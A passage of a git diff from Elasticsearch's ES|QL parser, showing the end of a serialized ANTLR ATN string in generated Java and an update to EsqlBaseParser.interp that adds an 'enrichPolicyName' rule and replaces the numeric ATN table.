"\u071e\u0007\u0004\u0000\u0000\u071e\u071f\u0007\u0011\u0000\u0000\u071f"+ + "\u01ed\u0001\u0000\u0000\u0000\u0720\u0721\u0003\u01d2\u00e1\u0000\u0721"+ + "\u0722\u0001\u0000\u0000\u0000\u0722\u0723\u0006\u00ef\u001d\u0000\u0723"+ + "\u01ef\u0001\u0000\u0000\u0000\u0724\u0725\u0003\u0010\u0000\u0000\u0725"+ + "\u0726\u0001\u0000\u0000\u0000\u0726\u0727\u0006\u00f0\u0000\u0000\u0727"+ + "\u01f1\u0001\u0000\u0000\u0000\u0728\u0729\u0003\u0012\u0001\u0000\u0729"+ + 
"\u072a\u0001\u0000\u0000\u0000\u072a\u072b\u0006\u00f1\u0000\u0000\u072b"+ + "\u01f3\u0001\u0000\u0000\u0000\u072c\u072d\u0003\u0014\u0002\u0000\u072d"+ + "\u072e\u0001\u0000\u0000\u0000\u072e\u072f\u0006\u00f2\u0000\u0000\u072f"+ + "\u01f5\u0001\u0000\u0000\u0000\u0730\u0731\u0003\u00b6S\u0000\u0731\u0732"+ + "\u0001\u0000\u0000\u0000\u0732\u0733\u0006\u00f3\r\u0000\u0733\u0734\u0006"+ + "\u00f3\u000e\u0000\u0734\u01f7\u0001\u0000\u0000\u0000\u0735\u0736\u0007"+ + "\n\u0000\u0000\u0736\u0737\u0007\u0005\u0000\u0000\u0737\u0738\u0007\u0015"+ + "\u0000\u0000\u0738\u0739\u0007\t\u0000\u0000\u0739\u01f9\u0001\u0000\u0000"+ + "\u0000\u073a\u073b\u0003\u0010\u0000\u0000\u073b\u073c\u0001\u0000\u0000"+ + "\u0000\u073c\u073d\u0006\u00f5\u0000\u0000\u073d\u01fb\u0001\u0000\u0000"+ + "\u0000\u073e\u073f\u0003\u0012\u0001\u0000\u073f\u0740\u0001\u0000\u0000"+ + "\u0000\u0740\u0741\u0006\u00f6\u0000\u0000\u0741\u01fd\u0001\u0000\u0000"+ + "\u0000\u0742\u0743\u0003\u0014\u0002\u0000\u0743\u0744\u0001\u0000\u0000"+ + "\u0000\u0744\u0745\u0006\u00f7\u0000\u0000\u0745\u01ff\u0001\u0000\u0000"+ + "\u0000F\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\t\n\u000b\f"+ + "\r\u000e\u000f\u0206\u020a\u020d\u0216\u0218\u0223\u0338\u038a\u038e\u0393"+ + "\u03f8\u03fa\u042d\u0432\u043b\u0442\u0447\u0449\u0454\u045c\u045f\u0461"+ + "\u0466\u046b\u0471\u0478\u047d\u0483\u0486\u048e\u0492\u051d\u0522\u0529"+ + "\u052b\u0530\u0535\u053c\u053e\u0558\u055d\u0562\u0564\u056a\u05aa\u05af"+ + "\u06cd\u06d1\u06d6\u06db\u06e0\u06e2\u06e6\u06e8*\u0000\u0001\u0000\u0005"+ + "\u0001\u0000\u0005\u0002\u0000\u0005\u0005\u0000\u0005\u0006\u0000\u0005"+ + "\u0007\u0000\u0005\b\u0000\u0005\t\u0000\u0005\n\u0000\u0005\f\u0000\u0005"+ + "\r\u0000\u0005\u000e\u0000\u0005\u000f\u0000\u00074\u0000\u0004\u0000"+ + "\u0000\u0007d\u0000\u0007J\u0000\u0007\u0084\u0000\u0007@\u0000\u0007"+ + ">\u0000\u0007f\u0000\u0007e\u0000\u0007a\u0000\u0005\u0004\u0000\u0005"+ + "\u0003\u0000\u0007O\u0000\u0007&\u0000\u00075\u0000\u0007:\u0000\u0007"+ + "\u0080\u0000\u0007L\u0000\u0007_\u0000\u0007^\u0000\u0007`\u0000\u0007"+ + "b\u0000\u0007=\u0000\u0007c\u0000\u0005\u0000\u0000\u0007\u0010\u0000"+ + "\u0007<\u0000\u0007k\u0000\u0005\u000b\u0000"; public static final ATN _ATN = new ATNDeserializer().deserialize(_serializedATN.toCharArray()); static { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.interp b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.interp index 3b180084e28ad..f919ed1ca055f 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.interp +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParser.interp @@ -331,6 +331,7 @@ explainCommand subqueryExpression showCommand enrichCommand +enrichPolicyName enrichWithClause sampleCommand lookupCommand @@ -372,4 +373,4 @@ joinPredicate atn: -[4, 1, 139, 811, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 2, 17, 7, 17, 2, 18, 7, 18, 2, 19, 7, 19, 2, 20, 7, 20, 2, 21, 7, 21, 2, 22, 7, 22, 2, 23, 7, 23, 2, 24, 7, 24, 2, 25, 7, 25, 2, 26, 7, 26, 2, 27, 7, 27, 2, 28, 7, 28, 2, 29, 7, 29, 2, 30, 7, 30, 2, 31, 7, 31, 2, 32, 7, 32, 2, 33, 7, 33, 2, 34, 7, 34, 2, 35, 7, 35, 2, 36, 7, 36, 2, 37, 7, 37, 2, 38, 7, 38, 2, 39, 7, 39, 2, 40, 7, 40, 2, 41, 7, 41, 2, 42, 7, 42, 2, 43, 
7, 43, 2, 44, 7, 44, 2, 45, 7, 45, 2, 46, 7, 46, 2, 47, 7, 47, 2, 48, 7, 48, 2, 49, 7, 49, 2, 50, 7, 50, 2, 51, 7, 51, 2, 52, 7, 52, 2, 53, 7, 53, 2, 54, 7, 54, 2, 55, 7, 55, 2, 56, 7, 56, 2, 57, 7, 57, 2, 58, 7, 58, 2, 59, 7, 59, 2, 60, 7, 60, 2, 61, 7, 61, 2, 62, 7, 62, 2, 63, 7, 63, 2, 64, 7, 64, 2, 65, 7, 65, 2, 66, 7, 66, 2, 67, 7, 67, 2, 68, 7, 68, 2, 69, 7, 69, 2, 70, 7, 70, 2, 71, 7, 71, 2, 72, 7, 72, 2, 73, 7, 73, 2, 74, 7, 74, 2, 75, 7, 75, 2, 76, 7, 76, 2, 77, 7, 77, 2, 78, 7, 78, 2, 79, 7, 79, 2, 80, 7, 80, 2, 81, 7, 81, 2, 82, 7, 82, 2, 83, 7, 83, 2, 84, 7, 84, 2, 85, 7, 85, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 182, 8, 1, 10, 1, 12, 1, 185, 9, 1, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 3, 2, 194, 8, 2, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 3, 3, 223, 8, 3, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 6, 1, 6, 1, 6, 1, 7, 1, 7, 1, 7, 5, 7, 236, 8, 7, 10, 7, 12, 7, 239, 9, 7, 1, 8, 1, 8, 1, 8, 3, 8, 244, 8, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 5, 9, 251, 8, 9, 10, 9, 12, 9, 254, 9, 9, 1, 10, 1, 10, 1, 10, 3, 10, 259, 8, 10, 1, 11, 1, 11, 1, 11, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 5, 13, 270, 8, 13, 10, 13, 12, 13, 273, 9, 13, 1, 13, 3, 13, 276, 8, 13, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 3, 14, 287, 8, 14, 1, 15, 1, 15, 1, 16, 1, 16, 1, 17, 1, 17, 1, 18, 1, 18, 1, 19, 1, 19, 1, 19, 1, 19, 5, 19, 301, 8, 19, 10, 19, 12, 19, 304, 9, 19, 1, 20, 1, 20, 1, 20, 1, 21, 1, 21, 3, 21, 311, 8, 21, 1, 21, 1, 21, 3, 21, 315, 8, 21, 1, 22, 1, 22, 1, 22, 5, 22, 320, 8, 22, 10, 22, 12, 22, 323, 9, 22, 1, 23, 1, 23, 1, 23, 3, 23, 328, 8, 23, 1, 24, 1, 24, 1, 24, 5, 24, 333, 8, 24, 10, 24, 12, 24, 336, 9, 24, 1, 25, 1, 25, 1, 25, 5, 25, 341, 8, 25, 10, 25, 12, 25, 344, 9, 25, 1, 26, 1, 26, 1, 26, 5, 26, 349, 8, 26, 10, 26, 12, 26, 352, 9, 26, 1, 27, 1, 27, 1, 28, 1, 28, 1, 28, 3, 28, 359, 8, 28, 1, 29, 1, 29, 3, 29, 363, 8, 29, 1, 30, 1, 30, 3, 30, 367, 8, 30, 1, 31, 1, 31, 1, 31, 3, 31, 372, 8, 31, 1, 32, 1, 32, 1, 32, 1, 33, 1, 33, 1, 33, 1, 33, 5, 33, 381, 8, 33, 10, 33, 12, 33, 384, 9, 33, 1, 34, 1, 34, 3, 34, 388, 8, 34, 1, 34, 1, 34, 3, 34, 392, 8, 34, 1, 35, 1, 35, 1, 35, 1, 36, 1, 36, 1, 36, 1, 37, 1, 37, 1, 37, 1, 37, 5, 37, 404, 8, 37, 10, 37, 12, 37, 407, 9, 37, 1, 38, 1, 38, 1, 38, 1, 38, 1, 38, 1, 38, 1, 38, 1, 38, 3, 38, 417, 8, 38, 1, 39, 1, 39, 1, 39, 1, 39, 3, 39, 423, 8, 39, 1, 40, 1, 40, 1, 40, 1, 40, 1, 41, 1, 41, 1, 41, 1, 42, 1, 42, 1, 42, 5, 42, 435, 8, 42, 10, 42, 12, 42, 438, 9, 42, 1, 43, 1, 43, 1, 43, 1, 43, 1, 44, 1, 44, 1, 44, 1, 45, 1, 45, 1, 45, 1, 45, 1, 46, 1, 46, 1, 46, 1, 47, 1, 47, 1, 47, 1, 47, 3, 47, 458, 8, 47, 1, 47, 1, 47, 1, 47, 1, 47, 5, 47, 464, 8, 47, 10, 47, 12, 47, 467, 9, 47, 3, 47, 469, 8, 47, 1, 48, 1, 48, 1, 48, 3, 48, 474, 8, 48, 1, 48, 1, 48, 1, 49, 1, 49, 1, 49, 1, 50, 1, 50, 1, 50, 1, 50, 1, 50, 1, 51, 1, 51, 1, 51, 1, 51, 3, 51, 490, 8, 51, 1, 52, 1, 52, 1, 52, 1, 52, 3, 52, 496, 8, 52, 1, 52, 1, 52, 1, 52, 1, 52, 1, 52, 3, 52, 503, 8, 52, 1, 53, 1, 53, 1, 53, 1, 54, 1, 54, 1, 54, 1, 55, 4, 55, 512, 8, 55, 11, 55, 12, 55, 513, 1, 56, 1, 56, 1, 56, 1, 56, 1, 57, 1, 57, 1, 57, 1, 57, 1, 57, 1, 57, 5, 57, 526, 8, 57, 10, 57, 12, 57, 529, 9, 57, 1, 58, 1, 58, 1, 59, 1, 59, 1, 60, 1, 60, 1, 60, 5, 60, 538, 8, 60, 10, 60, 12, 60, 541, 9, 60, 1, 61, 1, 61, 1, 61, 1, 61, 1, 62, 1, 62, 3, 62, 549, 8, 62, 1, 63, 1, 63, 1, 63, 1, 63, 1, 63, 1, 63, 3, 63, 557, 8, 63, 1, 64, 1, 64, 1, 64, 1, 
64, 3, 64, 563, 8, 64, 1, 64, 1, 64, 1, 64, 1, 64, 1, 65, 1, 65, 1, 65, 1, 65, 1, 65, 1, 65, 1, 65, 3, 65, 576, 8, 65, 1, 65, 1, 65, 1, 65, 1, 65, 1, 65, 5, 65, 583, 8, 65, 10, 65, 12, 65, 586, 9, 65, 1, 65, 1, 65, 1, 65, 1, 65, 1, 65, 3, 65, 593, 8, 65, 1, 65, 1, 65, 1, 65, 3, 65, 598, 8, 65, 1, 65, 1, 65, 1, 65, 1, 65, 1, 65, 1, 65, 5, 65, 606, 8, 65, 10, 65, 12, 65, 609, 9, 65, 1, 66, 1, 66, 3, 66, 613, 8, 66, 1, 66, 1, 66, 1, 66, 1, 66, 1, 66, 3, 66, 620, 8, 66, 1, 66, 1, 66, 1, 66, 1, 66, 1, 66, 3, 66, 627, 8, 66, 1, 66, 1, 66, 1, 66, 1, 66, 1, 66, 5, 66, 634, 8, 66, 10, 66, 12, 66, 637, 9, 66, 1, 66, 1, 66, 3, 66, 641, 8, 66, 1, 67, 1, 67, 1, 67, 3, 67, 646, 8, 67, 1, 67, 1, 67, 1, 67, 1, 68, 1, 68, 1, 68, 1, 68, 1, 68, 3, 68, 656, 8, 68, 1, 69, 1, 69, 1, 69, 1, 69, 3, 69, 662, 8, 69, 1, 69, 1, 69, 1, 69, 1, 69, 1, 69, 1, 69, 5, 69, 670, 8, 69, 10, 69, 12, 69, 673, 9, 69, 1, 70, 1, 70, 1, 70, 1, 70, 1, 70, 1, 70, 1, 70, 1, 70, 3, 70, 683, 8, 70, 1, 70, 1, 70, 1, 70, 5, 70, 688, 8, 70, 10, 70, 12, 70, 691, 9, 70, 1, 71, 1, 71, 1, 71, 1, 71, 1, 71, 1, 71, 5, 71, 699, 8, 71, 10, 71, 12, 71, 702, 9, 71, 1, 71, 1, 71, 3, 71, 706, 8, 71, 3, 71, 708, 8, 71, 1, 71, 1, 71, 1, 72, 1, 72, 1, 73, 1, 73, 1, 73, 1, 73, 5, 73, 718, 8, 73, 10, 73, 12, 73, 721, 9, 73, 1, 73, 1, 73, 1, 74, 1, 74, 1, 74, 1, 74, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 5, 75, 742, 8, 75, 10, 75, 12, 75, 745, 9, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 5, 75, 753, 8, 75, 10, 75, 12, 75, 756, 9, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 1, 75, 5, 75, 764, 8, 75, 10, 75, 12, 75, 767, 9, 75, 1, 75, 1, 75, 3, 75, 771, 8, 75, 1, 76, 1, 76, 1, 77, 1, 77, 3, 77, 777, 8, 77, 1, 78, 3, 78, 780, 8, 78, 1, 78, 1, 78, 1, 79, 3, 79, 785, 8, 79, 1, 79, 1, 79, 1, 80, 1, 80, 1, 81, 1, 81, 1, 82, 1, 82, 1, 82, 1, 82, 1, 82, 1, 83, 1, 83, 1, 84, 1, 84, 1, 84, 1, 84, 5, 84, 804, 8, 84, 10, 84, 12, 84, 807, 9, 84, 1, 85, 1, 85, 1, 85, 0, 5, 2, 114, 130, 138, 140, 86, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 66, 68, 70, 72, 74, 76, 78, 80, 82, 84, 86, 88, 90, 92, 94, 96, 98, 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 130, 132, 134, 136, 138, 140, 142, 144, 146, 148, 150, 152, 154, 156, 158, 160, 162, 164, 166, 168, 170, 0, 9, 2, 0, 53, 53, 107, 107, 1, 0, 101, 102, 2, 0, 57, 57, 63, 63, 2, 0, 66, 66, 69, 69, 1, 0, 87, 88, 1, 0, 89, 91, 2, 0, 65, 65, 78, 78, 2, 0, 80, 80, 82, 86, 2, 0, 22, 22, 24, 25, 838, 0, 172, 1, 0, 0, 0, 2, 175, 1, 0, 0, 0, 4, 193, 1, 0, 0, 0, 6, 222, 1, 0, 0, 0, 8, 224, 1, 0, 0, 0, 10, 227, 1, 0, 0, 0, 12, 229, 1, 0, 0, 0, 14, 232, 1, 0, 0, 0, 16, 243, 1, 0, 0, 0, 18, 247, 1, 0, 0, 0, 20, 255, 1, 0, 0, 0, 22, 260, 1, 0, 0, 0, 24, 263, 1, 0, 0, 0, 26, 266, 1, 0, 0, 0, 28, 286, 1, 0, 0, 0, 30, 288, 1, 0, 0, 0, 32, 290, 1, 0, 0, 0, 34, 292, 1, 0, 0, 0, 36, 294, 1, 0, 0, 0, 38, 296, 1, 0, 0, 0, 40, 305, 1, 0, 0, 0, 42, 308, 1, 0, 0, 0, 44, 316, 1, 0, 0, 0, 46, 324, 1, 0, 0, 0, 48, 329, 1, 0, 0, 0, 50, 337, 1, 0, 0, 0, 52, 345, 1, 0, 0, 0, 54, 353, 1, 0, 0, 0, 56, 358, 1, 0, 0, 0, 58, 362, 1, 0, 0, 0, 60, 366, 1, 0, 0, 0, 62, 371, 1, 0, 0, 0, 64, 373, 1, 0, 0, 0, 66, 376, 1, 0, 0, 0, 68, 385, 1, 0, 0, 0, 70, 393, 1, 0, 0, 0, 72, 396, 1, 0, 0, 0, 74, 399, 1, 0, 0, 0, 76, 416, 1, 0, 0, 0, 78, 418, 1, 0, 0, 0, 80, 424, 1, 0, 0, 0, 82, 428, 1, 0, 0, 0, 84, 431, 1, 0, 0, 0, 86, 439, 1, 0, 0, 0, 88, 443, 1, 0, 0, 0, 90, 446, 1, 0, 0, 0, 92, 450, 1, 0, 0, 0, 94, 
453, 1, 0, 0, 0, 96, 473, 1, 0, 0, 0, 98, 477, 1, 0, 0, 0, 100, 480, 1, 0, 0, 0, 102, 485, 1, 0, 0, 0, 104, 491, 1, 0, 0, 0, 106, 504, 1, 0, 0, 0, 108, 507, 1, 0, 0, 0, 110, 511, 1, 0, 0, 0, 112, 515, 1, 0, 0, 0, 114, 519, 1, 0, 0, 0, 116, 530, 1, 0, 0, 0, 118, 532, 1, 0, 0, 0, 120, 534, 1, 0, 0, 0, 122, 542, 1, 0, 0, 0, 124, 548, 1, 0, 0, 0, 126, 550, 1, 0, 0, 0, 128, 558, 1, 0, 0, 0, 130, 597, 1, 0, 0, 0, 132, 640, 1, 0, 0, 0, 134, 642, 1, 0, 0, 0, 136, 655, 1, 0, 0, 0, 138, 661, 1, 0, 0, 0, 140, 682, 1, 0, 0, 0, 142, 692, 1, 0, 0, 0, 144, 711, 1, 0, 0, 0, 146, 713, 1, 0, 0, 0, 148, 724, 1, 0, 0, 0, 150, 770, 1, 0, 0, 0, 152, 772, 1, 0, 0, 0, 154, 776, 1, 0, 0, 0, 156, 779, 1, 0, 0, 0, 158, 784, 1, 0, 0, 0, 160, 788, 1, 0, 0, 0, 162, 790, 1, 0, 0, 0, 164, 792, 1, 0, 0, 0, 166, 797, 1, 0, 0, 0, 168, 799, 1, 0, 0, 0, 170, 808, 1, 0, 0, 0, 172, 173, 3, 2, 1, 0, 173, 174, 5, 0, 0, 1, 174, 1, 1, 0, 0, 0, 175, 176, 6, 1, -1, 0, 176, 177, 3, 4, 2, 0, 177, 183, 1, 0, 0, 0, 178, 179, 10, 1, 0, 0, 179, 180, 5, 52, 0, 0, 180, 182, 3, 6, 3, 0, 181, 178, 1, 0, 0, 0, 182, 185, 1, 0, 0, 0, 183, 181, 1, 0, 0, 0, 183, 184, 1, 0, 0, 0, 184, 3, 1, 0, 0, 0, 185, 183, 1, 0, 0, 0, 186, 194, 3, 22, 11, 0, 187, 194, 3, 12, 6, 0, 188, 194, 3, 92, 46, 0, 189, 190, 4, 2, 1, 0, 190, 194, 3, 24, 12, 0, 191, 192, 4, 2, 2, 0, 192, 194, 3, 88, 44, 0, 193, 186, 1, 0, 0, 0, 193, 187, 1, 0, 0, 0, 193, 188, 1, 0, 0, 0, 193, 189, 1, 0, 0, 0, 193, 191, 1, 0, 0, 0, 194, 5, 1, 0, 0, 0, 195, 223, 3, 40, 20, 0, 196, 223, 3, 8, 4, 0, 197, 223, 3, 70, 35, 0, 198, 223, 3, 64, 32, 0, 199, 223, 3, 42, 21, 0, 200, 223, 3, 66, 33, 0, 201, 223, 3, 72, 36, 0, 202, 223, 3, 74, 37, 0, 203, 223, 3, 78, 39, 0, 204, 223, 3, 80, 40, 0, 205, 223, 3, 94, 47, 0, 206, 223, 3, 82, 41, 0, 207, 223, 3, 164, 82, 0, 208, 223, 3, 104, 52, 0, 209, 223, 3, 128, 64, 0, 210, 223, 3, 98, 49, 0, 211, 223, 3, 108, 54, 0, 212, 213, 4, 3, 3, 0, 213, 223, 3, 102, 51, 0, 214, 215, 4, 3, 4, 0, 215, 223, 3, 100, 50, 0, 216, 217, 4, 3, 5, 0, 217, 223, 3, 106, 53, 0, 218, 219, 4, 3, 6, 0, 219, 223, 3, 126, 63, 0, 220, 221, 4, 3, 7, 0, 221, 223, 3, 118, 59, 0, 222, 195, 1, 0, 0, 0, 222, 196, 1, 0, 0, 0, 222, 197, 1, 0, 0, 0, 222, 198, 1, 0, 0, 0, 222, 199, 1, 0, 0, 0, 222, 200, 1, 0, 0, 0, 222, 201, 1, 0, 0, 0, 222, 202, 1, 0, 0, 0, 222, 203, 1, 0, 0, 0, 222, 204, 1, 0, 0, 0, 222, 205, 1, 0, 0, 0, 222, 206, 1, 0, 0, 0, 222, 207, 1, 0, 0, 0, 222, 208, 1, 0, 0, 0, 222, 209, 1, 0, 0, 0, 222, 210, 1, 0, 0, 0, 222, 211, 1, 0, 0, 0, 222, 212, 1, 0, 0, 0, 222, 214, 1, 0, 0, 0, 222, 216, 1, 0, 0, 0, 222, 218, 1, 0, 0, 0, 222, 220, 1, 0, 0, 0, 223, 7, 1, 0, 0, 0, 224, 225, 5, 16, 0, 0, 225, 226, 3, 130, 65, 0, 226, 9, 1, 0, 0, 0, 227, 228, 3, 54, 27, 0, 228, 11, 1, 0, 0, 0, 229, 230, 5, 12, 0, 0, 230, 231, 3, 14, 7, 0, 231, 13, 1, 0, 0, 0, 232, 237, 3, 16, 8, 0, 233, 234, 5, 62, 0, 0, 234, 236, 3, 16, 8, 0, 235, 233, 1, 0, 0, 0, 236, 239, 1, 0, 0, 0, 237, 235, 1, 0, 0, 0, 237, 238, 1, 0, 0, 0, 238, 15, 1, 0, 0, 0, 239, 237, 1, 0, 0, 0, 240, 241, 3, 48, 24, 0, 241, 242, 5, 58, 0, 0, 242, 244, 1, 0, 0, 0, 243, 240, 1, 0, 0, 0, 243, 244, 1, 0, 0, 0, 244, 245, 1, 0, 0, 0, 245, 246, 3, 130, 65, 0, 246, 17, 1, 0, 0, 0, 247, 252, 3, 20, 10, 0, 248, 249, 5, 62, 0, 0, 249, 251, 3, 20, 10, 0, 250, 248, 1, 0, 0, 0, 251, 254, 1, 0, 0, 0, 252, 250, 1, 0, 0, 0, 252, 253, 1, 0, 0, 0, 253, 19, 1, 0, 0, 0, 254, 252, 1, 0, 0, 0, 255, 258, 3, 48, 24, 0, 256, 257, 5, 58, 0, 0, 257, 259, 3, 130, 65, 0, 258, 256, 1, 0, 0, 0, 258, 259, 1, 0, 0, 0, 259, 21, 1, 0, 0, 0, 260, 261, 5, 19, 0, 0, 261, 262, 
3, 26, 13, 0, 262, 23, 1, 0, 0, 0, 263, 264, 5, 20, 0, 0, 264, 265, 3, 26, 13, 0, 265, 25, 1, 0, 0, 0, 266, 271, 3, 28, 14, 0, 267, 268, 5, 62, 0, 0, 268, 270, 3, 28, 14, 0, 269, 267, 1, 0, 0, 0, 270, 273, 1, 0, 0, 0, 271, 269, 1, 0, 0, 0, 271, 272, 1, 0, 0, 0, 272, 275, 1, 0, 0, 0, 273, 271, 1, 0, 0, 0, 274, 276, 3, 38, 19, 0, 275, 274, 1, 0, 0, 0, 275, 276, 1, 0, 0, 0, 276, 27, 1, 0, 0, 0, 277, 278, 3, 30, 15, 0, 278, 279, 5, 61, 0, 0, 279, 280, 3, 34, 17, 0, 280, 287, 1, 0, 0, 0, 281, 282, 3, 34, 17, 0, 282, 283, 5, 60, 0, 0, 283, 284, 3, 32, 16, 0, 284, 287, 1, 0, 0, 0, 285, 287, 3, 36, 18, 0, 286, 277, 1, 0, 0, 0, 286, 281, 1, 0, 0, 0, 286, 285, 1, 0, 0, 0, 287, 29, 1, 0, 0, 0, 288, 289, 5, 107, 0, 0, 289, 31, 1, 0, 0, 0, 290, 291, 5, 107, 0, 0, 291, 33, 1, 0, 0, 0, 292, 293, 5, 107, 0, 0, 293, 35, 1, 0, 0, 0, 294, 295, 7, 0, 0, 0, 295, 37, 1, 0, 0, 0, 296, 297, 5, 106, 0, 0, 297, 302, 5, 107, 0, 0, 298, 299, 5, 62, 0, 0, 299, 301, 5, 107, 0, 0, 300, 298, 1, 0, 0, 0, 301, 304, 1, 0, 0, 0, 302, 300, 1, 0, 0, 0, 302, 303, 1, 0, 0, 0, 303, 39, 1, 0, 0, 0, 304, 302, 1, 0, 0, 0, 305, 306, 5, 9, 0, 0, 306, 307, 3, 14, 7, 0, 307, 41, 1, 0, 0, 0, 308, 310, 5, 15, 0, 0, 309, 311, 3, 44, 22, 0, 310, 309, 1, 0, 0, 0, 310, 311, 1, 0, 0, 0, 311, 314, 1, 0, 0, 0, 312, 313, 5, 59, 0, 0, 313, 315, 3, 14, 7, 0, 314, 312, 1, 0, 0, 0, 314, 315, 1, 0, 0, 0, 315, 43, 1, 0, 0, 0, 316, 321, 3, 46, 23, 0, 317, 318, 5, 62, 0, 0, 318, 320, 3, 46, 23, 0, 319, 317, 1, 0, 0, 0, 320, 323, 1, 0, 0, 0, 321, 319, 1, 0, 0, 0, 321, 322, 1, 0, 0, 0, 322, 45, 1, 0, 0, 0, 323, 321, 1, 0, 0, 0, 324, 327, 3, 16, 8, 0, 325, 326, 5, 16, 0, 0, 326, 328, 3, 130, 65, 0, 327, 325, 1, 0, 0, 0, 327, 328, 1, 0, 0, 0, 328, 47, 1, 0, 0, 0, 329, 334, 3, 62, 31, 0, 330, 331, 5, 64, 0, 0, 331, 333, 3, 62, 31, 0, 332, 330, 1, 0, 0, 0, 333, 336, 1, 0, 0, 0, 334, 332, 1, 0, 0, 0, 334, 335, 1, 0, 0, 0, 335, 49, 1, 0, 0, 0, 336, 334, 1, 0, 0, 0, 337, 342, 3, 56, 28, 0, 338, 339, 5, 64, 0, 0, 339, 341, 3, 56, 28, 0, 340, 338, 1, 0, 0, 0, 341, 344, 1, 0, 0, 0, 342, 340, 1, 0, 0, 0, 342, 343, 1, 0, 0, 0, 343, 51, 1, 0, 0, 0, 344, 342, 1, 0, 0, 0, 345, 350, 3, 50, 25, 0, 346, 347, 5, 62, 0, 0, 347, 349, 3, 50, 25, 0, 348, 346, 1, 0, 0, 0, 349, 352, 1, 0, 0, 0, 350, 348, 1, 0, 0, 0, 350, 351, 1, 0, 0, 0, 351, 53, 1, 0, 0, 0, 352, 350, 1, 0, 0, 0, 353, 354, 7, 1, 0, 0, 354, 55, 1, 0, 0, 0, 355, 359, 5, 128, 0, 0, 356, 359, 3, 58, 29, 0, 357, 359, 3, 60, 30, 0, 358, 355, 1, 0, 0, 0, 358, 356, 1, 0, 0, 0, 358, 357, 1, 0, 0, 0, 359, 57, 1, 0, 0, 0, 360, 363, 5, 76, 0, 0, 361, 363, 5, 95, 0, 0, 362, 360, 1, 0, 0, 0, 362, 361, 1, 0, 0, 0, 363, 59, 1, 0, 0, 0, 364, 367, 5, 94, 0, 0, 365, 367, 5, 96, 0, 0, 366, 364, 1, 0, 0, 0, 366, 365, 1, 0, 0, 0, 367, 61, 1, 0, 0, 0, 368, 372, 3, 54, 27, 0, 369, 372, 3, 58, 29, 0, 370, 372, 3, 60, 30, 0, 371, 368, 1, 0, 0, 0, 371, 369, 1, 0, 0, 0, 371, 370, 1, 0, 0, 0, 372, 63, 1, 0, 0, 0, 373, 374, 5, 11, 0, 0, 374, 375, 3, 150, 75, 0, 375, 65, 1, 0, 0, 0, 376, 377, 5, 14, 0, 0, 377, 382, 3, 68, 34, 0, 378, 379, 5, 62, 0, 0, 379, 381, 3, 68, 34, 0, 380, 378, 1, 0, 0, 0, 381, 384, 1, 0, 0, 0, 382, 380, 1, 0, 0, 0, 382, 383, 1, 0, 0, 0, 383, 67, 1, 0, 0, 0, 384, 382, 1, 0, 0, 0, 385, 387, 3, 130, 65, 0, 386, 388, 7, 2, 0, 0, 387, 386, 1, 0, 0, 0, 387, 388, 1, 0, 0, 0, 388, 391, 1, 0, 0, 0, 389, 390, 5, 73, 0, 0, 390, 392, 7, 3, 0, 0, 391, 389, 1, 0, 0, 0, 391, 392, 1, 0, 0, 0, 392, 69, 1, 0, 0, 0, 393, 394, 5, 29, 0, 0, 394, 395, 3, 52, 26, 0, 395, 71, 1, 0, 0, 0, 396, 397, 5, 28, 0, 0, 397, 398, 3, 52, 26, 0, 398, 73, 
1, 0, 0, 0, 399, 400, 5, 32, 0, 0, 400, 405, 3, 76, 38, 0, 401, 402, 5, 62, 0, 0, 402, 404, 3, 76, 38, 0, 403, 401, 1, 0, 0, 0, 404, 407, 1, 0, 0, 0, 405, 403, 1, 0, 0, 0, 405, 406, 1, 0, 0, 0, 406, 75, 1, 0, 0, 0, 407, 405, 1, 0, 0, 0, 408, 409, 3, 50, 25, 0, 409, 410, 5, 132, 0, 0, 410, 411, 3, 50, 25, 0, 411, 417, 1, 0, 0, 0, 412, 413, 3, 50, 25, 0, 413, 414, 5, 58, 0, 0, 414, 415, 3, 50, 25, 0, 415, 417, 1, 0, 0, 0, 416, 408, 1, 0, 0, 0, 416, 412, 1, 0, 0, 0, 417, 77, 1, 0, 0, 0, 418, 419, 5, 8, 0, 0, 419, 420, 3, 140, 70, 0, 420, 422, 3, 160, 80, 0, 421, 423, 3, 84, 42, 0, 422, 421, 1, 0, 0, 0, 422, 423, 1, 0, 0, 0, 423, 79, 1, 0, 0, 0, 424, 425, 5, 10, 0, 0, 425, 426, 3, 140, 70, 0, 426, 427, 3, 160, 80, 0, 427, 81, 1, 0, 0, 0, 428, 429, 5, 27, 